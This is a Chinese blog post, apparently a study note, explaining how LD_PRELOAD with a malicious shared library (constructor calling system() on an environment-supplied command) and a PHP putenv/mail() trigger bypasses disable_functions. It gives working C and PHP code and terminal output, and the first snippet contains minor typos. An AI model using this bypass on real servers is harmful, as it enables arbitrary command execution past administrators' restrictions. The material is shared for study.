LD_PRELOAD 绕过 disable_function 学习
借助这位师傅的文章来学习通过LD_PRELOAD来绕过disable_function的原理
【PHP绕过】LD_PRELOAD bypass disable_functions_phpid绕过-CSDN博客
感谢这位师傅的贡献
介绍
静态链接:
(1)举个情景来帮助理解: 假设你要搬家,但家具不换,全部打包带走。
(2)优点:搬到新家后,直接开箱即用,不依赖外部资源(不去邻居家借洗衣机)
(3)缺点:搬家时行李又多又重(程序体积大),而且如果家具升级(比如库更新),得重新买一套再搬一次(重新编译程序)
(4)在编译时,所有依赖的库代码可直接嵌入到可执行文件中,程序独立运行,但体积较大,且库更新需重新编译程序
动态链接:
(1)举个情景来帮助理解:这次搬家,只带必需品,其他东西(比如工具书,电器)选择去附近的图书馆或共享商店按需借用。需要时随时去拿,用完归还。
(2)优点:行李轻便(程序体积小),多个家庭共享同一本书或工具(多个程序共享一个库),资源更新也方便(图书馆换新书)
(3)缺点:可能出现图书馆关门(库文件缺失)
(4)编译时不进行函数库的链接,而是在程序运行时才动态地载入所需的函数库。这样使得可执行文件体积较小,并且多个程序可以共享相同的动态库,节省内存资源。动态链接提高了程序的灵活性和可维护性。
再来了解一下什么是LD_PRELOAD
LD_PRELOAD 是linux/Unix系统中一个强大的环境变量,允许用户在程序运行时优先加载自定义的共享库,从而覆盖或替换标准库中的函数。
也就是说,通过LD_PRELOAD指定的共享库会在程序启动时最先加载,其定义的函数会覆盖后续加载的同名函数。
用法
那么其利用方法很明显了,如果我们能在我们的自定义库中写入一些与”原本函数“ 作用不同 但同名 的函数,就能成功覆盖掉原本函数的用法了。
跟着师傅的例子再来了解一下
劫持getgid
看看id命令在执行过程中会用到的函数表
┌──(root㉿kali)-[~/Desktop]
└─# readelf -Ws /usr/bin/id Symbol table '.dynsym' contains 74 entries:Num: Value Size Type Bind Vis Ndx Name0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND endgrent@GLIBC_2.2.5 (2)2: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getenv@GLIBC_2.2.5 (2)
而这些函数都是可以被我们覆盖的,现在观察一下getgid函数的内容,输入 man getgid
构造一个与之原型相同的函数
#include<stdlib.h>
#include<unistd.h>
#include<sys.types.h>gid_t getgid(void){unsetenv("LD_PRELOAD");// 使用unsetenv删除原有的共享库system("'echo 'I hacked U!!\n' > successful");
}运行指令
gcc --shared -fPIC rob.c -o rob.so 
接下来,载入这个库并运行id命令
┌──(root㉿kali)-[~/test]
└─# LD_PRELOAD=./rob.so id
uid=0(root) gid=0(root) groups=0(root)
得到successful文件
这就是一次劫持操作
绕过disable_function
当题目中有disable_function的限制时,会导致我们拿到的shell都是空的,这时就要想办法绕过disable_function。其实我们要实现的操作主要是执行命令,可以使用LD_PRELOAD环境变量强制该程序优先加载一个恶意共享库(.so文件),覆盖其调用的标准库函数(如getuid()),从而执行任意代码
编写恶意文件
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加载库的同时执行函数unsetenv("LD_PRELOAD");system("ls > hackfile");// 用于php
}运行指令
┌──(root㉿kali)-[~/test]
└─# gcc --shared -fPIC hack.c -o hack.so
编写hack.php文件
<?php
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>此时再执行,就可以成功劫持了
┌──(root㉿kali)-[~/test]
└─# php hack.php
sh: 1: /usr/sbin/sendmail: not found
1
hack.c
hack.php
hack.so
hackfile
rob.c
rob.so
successful
同时,这位师傅还给出了手动输入参数的做法,真的很厉害
将hack.c改为:
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加载库的同时执行函数unsetenv("LD_PRELOAD");char *cmd=getenv("MY_CMD");system(cmd);
}再将hack.php改为:
<?php
$a=$argv[1];
$cmd="$a > hackfile";
@putenv("MY_CMD=".$cmd);
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>就可以这样运行代码了:
┌──(root㉿kali)-[~/test]
└─# php hack.php id
sh: 1: /usr/sbin/sendmail: not found
uid=0(root) gid=0(root) groups=0(root)
前几天看了一篇推文,发觉对漏洞和工具的原理还是要去理解。感谢师傅提供的思路和方法!
相关文章:
LD_PRELOAD 绕过 disable_function 学习
借助这位师傅的文章来学习通过LD_PRELOAD来绕过disable_function的原理 【PHP绕过】LD_PRELOAD bypass disable_functions_phpid绕过-CSDN博客 感谢这位师傅的贡献 介绍 静态链接: (1)举个情景来帮助理解: 假设你要搬家&#x…...
如何用JAVA实现布隆过滤器?
目录 引言 布隆过滤器的原理 1. 核心思想 2. 优缺点 布隆过滤器的使用场景 Java 实现布隆过滤器 1. 实现步骤 2. 代码实现 3. 代码说明 4. 测试结果 布隆过滤器的优化 总结 引言 布隆过滤器(Bloom Filter)是一种高效的概率数据结构࿰…...
游戏开发 游戏开始界面
目录 前言 一 游戏初始化界面的分析 二 游戏的大概框架 三 显示界面的开发 四 完整代码 总结 我们可以来看看游戏初始界面是什么样的 勇士游戏样例 前言 这里是开发游戏的初始界面 一 游戏初始化界面的分析 我们需要一个背景图,开始游戏图标࿰…...
Python解析 Flink Job 依赖的checkpoint 路径
引言 Apache Flink 是一个强大的分布式处理框架,广泛用于批处理和流处理任务。其 checkpoint 机制是确保容错的关键功能,允许在计算过程中保存状态,以便在故障时从最近的 checkpoint 恢复。本文详细探讨了一个 Python 脚本,该脚本…...
Javascript网页设计案例:通过PDFLib实现一款PDF分割工具,分割方式自定义-完整源代码,开箱即用
功能预览 一、工具简介 PDF 分割工具支持以下核心功能: 拖放或上传 PDF 文件:用户可以通过拖放或点击上传 PDF 文件。两种分割模式: 指定范围:用户可以指定起始页和结束页,提取特定范围的内容。固定间距:用户可以设置间隔页数(例如每 5 页分割一次),工具会自动完成分…...
计算机视觉算法实战——产品分拣(主页有源码)
✨个人主页欢迎您的访问 ✨期待您的三连 ✨ ✨个人主页欢迎您的访问 ✨期待您的三连 ✨ ✨个人主页欢迎您的访问 ✨期待您的三连✨ 1. 领域简介✨✨ 产品分拣是工业自动化和物流领域的核心技术,旨在通过机器视觉系统对传送带上的物品进行快速识别、定位和分类&a…...
汽车软件︱AUTO TECH China 2025 广州国际汽车软件与安全技术展览会:开启汽车科技新时代
在汽车产业智能化与网联化飞速发展的当下,汽车软件与安全技术已然成为行业变革的核心驱动力。2025年11月20 - 22日,AUTO TECH China 2025 广州国际汽车软件与安全技术展览会将在广州保利世贸博览馆盛大开幕,这场展会将汇聚行业前沿成果&#…...
Visual Studio打开文件后,中文变乱码的解决方案
文件加载 使用Unicode(UTF-8)编码加载文件 C:\WorkSpace\Assets\Scripts\UI\View\ExecuteComplateView.cs时,有些字节已用Unicode替换字符替换。保存该文件将不会保留原始文件内容。...
Python爬虫selenium验证-中文识别点选+图片验证码案例
1.获取图片 import re import time import ddddocr import requests from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.chrome.service import Service from selenium.webdriver.support.wait import WebDriverWait from …...
)
MySQL后端返回给前端的时间变了(时区问题)
问题:MySQL里的时间例如为2025-01-10 21:19:30,但是返回到前端就变成了2025-01-10 13:19:30,会出现小时不一样或日期变成隔日的问题 一般来说设计字段时会使用datetime字段类型,这是一种用于时间的字段类型,而这个类型…...
计算机毕业设计Hadoop+Spark+DeepSeek-R1大模型民宿推荐系统 hive民宿可视化 民宿爬虫 大数据毕业设计(源码+文档+PPT+讲解)
温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 作者简介:Java领…...
前端性能优化面试题及参考答案
目录 如何通过合并文件减少 HTTP 请求次数? 列举 CDN 加速的适用场景与实现原理。 如何利用 HTTP/2 的多路复用特性优化资源加载? 描述 DNS 预解析的实现方式及其对性能的影响。 异步加载脚本时,async 与 defer 属性的区别是什么? 如何优化 AJAX 请求的并发数与优先级…...
【NLP 37、激活函数 ③ relu激活函数】
—— 25.2.23 ReLU广泛应用于卷积神经网络(CNN)和全连接网络,尤其在图像分类(如ImageNet)、语音识别等领域表现优异。其高效性和非线性特性使其成为深度学习默认激活函数的首选 一、定义与数学表达式 ReLU࿰…...
量子计算的威胁,以及企业可以采取的措施
当谷歌、IBM、Honeywell和微软等科技巨头纷纷投身量子计算领域时,一场技术军备竞赛已然拉开帷幕。 量子计算虽能为全球数字经济带来巨大价值,但也有可能对相互关联的系统、设备和数据造成损害。这一潜在影响在全球网络安全领域引起了强烈关注。也正因如…...
——解锁 C# 变量的更多奥秘:从基础到进阶的深度指南)
C#初级教程(5)——解锁 C# 变量的更多奥秘:从基础到进阶的深度指南
一、变量类型转换:隐式与显式的门道 (一)隐式转换:编译器的 “贴心小助手” 隐式转换是编译器自动进行的类型转换,无需开发者手动干预。这种转换通常发生在将取值范围小的数据类型赋值给取值范围大的数据类型时&#…...
训练自己的数据集)
Pytorch实现之GIEGAN(生成器信息增强GAN)训练自己的数据集
简介 简介:在训练数据样本之前首先利用VAE来推断潜在空间中不同类的分布,用于后续的训练,并使用它来初始化GAN。与ACGAN和BAGAN不同的是,提出的GIEGAN有一个分类器结构,这个分类器主要判断生成的图像或者样本图像属于哪个类,而鉴别器仅判断图像是来自于生成器还是真实样…...
使用PHP接入纯真IP库:实现IP地址地理位置查询
引言 在日常开发中,我们经常需要根据用户的IP地址获取其地理位置信息,例如国家、省份、城市等。纯真IP库(QQWry)是一个常用的IP地址数据库,提供了丰富的IP地址与地理位置的映射关系。本文将介绍如何使用PHP接入纯真IP库,并通过一个完整的案例演示如何实现IP地址的地理位…...
计算机毕业设计SpringBoot+Vue.jst0甘肃非物质文化网站(源码+LW文档+PPT+讲解)
温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 作者简介:Java领…...
无人机实战系列(三)本地摄像头+远程GPU转换深度图
这篇文章将结合之前写的两篇文章 无人机实战系列(一)在局域网内传输数据 和 无人机实战系列(二)本地摄像头 Depth-Anything V2 实现了以下功能: 本地笔记本摄像头发布图像 远程GPU实时处理(无回传&#…...
七.智慧城市数据治理平台架构
一、整体架构概览 智慧城市数据治理平台架构描绘了一个全面的智慧城市数据治理平台,旨在实现城市数据的统一管理、共享和应用,为城市运行、管理和决策提供数据支撑。整体架构呈现出分层、模块化、集约化的特点,并强调数据安全和标准规范。 智…...
英雄联盟玩家必看:告别手动配置!ChampR智能助手让你3秒搞定出装符文
英雄联盟玩家必看:告别手动配置!ChampR智能助手让你3秒搞定出装符文 【免费下载链接】champr 🐶 Yet another League of Legends helper 项目地址: https://gitcode.com/gh_mirrors/ch/champr 还在为每次游戏都要手动调整出装和符文而…...
EmojiOne Color彩色字体实战指南:打造生动表情符号的高效方案
EmojiOne Color彩色字体实战指南:打造生动表情符号的高效方案 【免费下载链接】emojione-color OpenType-SVG font of EmojiOne 2.3 项目地址: https://gitcode.com/gh_mirrors/em/emojione-color EmojiOne Color是一款基于OpenType-SVG格式的开源彩色表情字…...
)
终极指南:3分钟创建专属动态生日祝福网页(完全免费)
终极指南:3分钟创建专属动态生日祝福网页(完全免费) 【免费下载链接】happy-birthday Wish your friend/loved-ones happy birthday in a nerdy way. 项目地址: https://gitcode.com/gh_mirrors/ha/happy-birthday 还在为生日祝福缺乏…...
终极城通网盘限速破解:5分钟实现40倍高速下载的完整指南
终极城通网盘限速破解:5分钟实现40倍高速下载的完整指南 【免费下载链接】ctfileGet 获取城通网盘一次性直连地址 项目地址: https://gitcode.com/gh_mirrors/ct/ctfileGet 你是否曾因城通网盘几十KB/s的龟速下载而抓狂?面对几百MB甚至几GB的文件…...
)
别再死记硬背公式了!用Halcon+C#手把手搞定机器人九点标定(附完整代码与调试技巧)
HalconC#实战:机器人九点标定的工程化实现与避坑指南 在工业自动化领域,视觉引导机器人作业已成为提升生产效率的关键技术。而实现这一技术的核心环节,就是建立相机像素坐标系与机器人物理坐标系之间的精确映射关系——也就是我们常说的九点标…...
完整迁移指南:SillyTavern高效升级与数据安全保护
完整迁移指南:SillyTavern高效升级与数据安全保护 【免费下载链接】SillyTavern LLM Frontend for Power Users. 项目地址: https://gitcode.com/GitHub_Trending/si/SillyTavern SillyTavern作为一款面向高级用户的LLM前端工具,其版本迁移过程需…...
仓颉语言深度前瞻:华为自研编程语言如何改变鸿蒙开发?
仓颉语言深度前瞻:华为自研编程语言如何改变鸿蒙开发?当鸿蒙遇见仓颉,一场编程语言的范式革命正在开启引言:仓颉造字,鸿蒙新生 2024年6月21日,华为正式发布了自研编程语言——仓颉(Cangjie&…...
Android Studio安装后必做的5件事:从汉化乱码到模拟器提速的完整配置清单
Android Studio安装后必做的5件事:从汉化乱码到模拟器提速的完整配置清单 刚装好Android Studio的兴奋感,往往会在打开IDE的瞬间被各种小问题冲淡——控制台里看不懂的乱码、慢到怀疑人生的模拟器、每次启动都要重新加载的旧项目...这些问题看似微不足道…...
深度解析虚幻引擎Pak文件:5个实战技巧掌握UnrealPakViewer高效使用
深度解析虚幻引擎Pak文件:5个实战技巧掌握UnrealPakViewer高效使用 【免费下载链接】UnrealPakViewer 查看 UE4 Pak 文件的图形化工具,支持 UE4 pak/ucas 文件 项目地址: https://gitcode.com/gh_mirrors/un/UnrealPakViewer UnrealPakViewer是一…...
从响应头到恶意请求:手把手教你三种手工识别WAF的‘土方法’,比工具更隐蔽
从响应头到恶意请求:手工识别WAF的三种隐蔽技巧 在Web安全测试中,了解目标网站是否部署了WAF(Web应用防火墙)是至关重要的一步。与依赖自动化工具不同,手工识别方法更加隐蔽,特别适合在环境受限或需要保持低…...